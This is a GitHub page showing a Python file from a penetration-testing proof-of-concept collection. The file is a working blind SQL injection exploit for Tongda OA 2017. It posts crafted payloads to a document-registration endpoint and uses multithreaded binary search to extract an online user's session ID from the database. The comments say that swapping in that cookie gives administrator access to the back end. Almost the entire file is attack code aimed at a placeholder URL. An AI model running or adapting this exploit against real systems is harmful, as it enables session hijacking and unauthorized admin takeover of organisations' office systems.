forked from Mr-xn/Penetration_Testing_POC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtongda_oa_2017_sql_injection.py
83 lines (71 loc) · 2.54 KB
/
tongda_oa_2017_sql_injection.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
import requests
import _thread
import time
requests.packages.urllib3.disable_warnings()
# 测试在 通达oa 2017版本
# 使用 多线程+二分法 跑出session id,然后替换cookie后
# 然后访问http://www.xxx.com/general/ 即可以管理员身份登录后台
# 来自 https://mp.weixin.qq.com/s/zH13q6xBRc58ggHqfKKi_g
UNAME_length = 26
USERUID = []
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36',"Content-Type":"application/x-www-form-urlencoded",'Connection':'close'}
proxies = {'http': '127.0.0.1:8080','https': '127.0.0.1:8080'}
def get_url(url,num,uid):
global UNAME_length
global USERUID
litgh = 48
right = 120
tmp = 0
while litgh <= right:
mid = int((litgh+right)/2)
if tmp == mid:
break
else: tmp = mid
flag = run_payload(url,uid,num,mid)
if flag:
litgh = mid
else:
right = mid
USERUID[num-1] = chr(mid)
print("session: ",num,chr(mid))
def run_payload(url,uid,num,mid):
try:
payload =f"""title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/{uid},1),{num},1))>%3d{mid},1,710)))# =1&_SERVER="""
req = requests.post(url, headers=header, proxies=proxies,data=payload,verify=False,timeout=20,allow_redirects=False)
if req.status_code == 302:
return True
elif req.status_code == 500:
return False
elif req.status_code != 500:
return run_payload(url,uid,num,mid)
except Exception as e:
return run_payload(url,uid,num,mid)
def get_uname(url,uid):
USERUID.clear()
[USERUID.append("") for one in range(0,UNAME_length)]
for num in range(1,UNAME_length+1):
_thread.start_new_thread(get_url, (url,num,uid,)) # 多线程
tmp = 0
while 1: # 等待跑完26位session id
flag = 0
for num in range(0,len(USERUID)):
if USERUID[num] != '':
flag += 1
uname = ""
for num in range(0,len(USERUID)):
uname += str(USERUID[num])
if flag != tmp:
print(f"已完成: {flag}/{UNAME_length} SID:{uname} {USERUID} ")
tmp = flag
if flag == UNAME_length:
break
time.sleep(0.5)
return uname
def main(url):
url += "/general/document/index.php/recv/register/insert"
print(url)
uid=1 # 获取第几个用户的session
uname = get_uname(url,uid-1)
print("UNAME = ",uname)
url="http://www.xxx.com/"
main(url)